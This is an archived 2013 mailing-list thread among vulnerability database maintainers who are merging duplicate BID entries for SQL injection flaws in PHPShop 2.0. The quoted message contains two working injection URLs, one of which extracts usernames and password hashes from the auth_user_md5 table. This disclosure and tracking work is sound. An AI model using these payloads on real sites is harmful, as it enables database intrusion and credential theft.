[VIM] PHPShop CMS Multiple SQL Injection Vulnerabilities
Narayan Agarwalla
Narayan_Agarwalla at symantec.com
Wed Jan 16 11:59:49 CST 2013
Hi George,
BID 37227: Information regarding 'product_id' and 'module_id' parameters moved to BID 27570 and BID 57320.
BID 27570: phpshop 2.0 added as vulnerable
BID 57320: Information regarding 'product_id' moved to BID 27570
Thanks and Regards,
Narayan
-----Original Message-----
From: vim-bounces at attrition.org [mailto:vim-bounces at attrition.org] On Behalf Of George A. Theall
Sent: Wednesday, January 16, 2013 6:13 PM
To: Vulnerability Information Managers
Subject: [VIM] PHPShop CMS Multiple SQL Injection Vulnerabilities
BID 57320 was created yesterday for the SQL injections reported in EDB-ID 24108:
http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
These are among the issues reported in http://archives.neohapsis.com/archives/bugtraq/2009-12/0099.html and covered already by BID 37227.
And the shop/flypage one was also reported earlier in http://archives.neohapsis.com/archives/bugtraq/2008-02/0014.html and is covered by BID 27570.
Rob / Venkat?
George
--
theall at tenable.com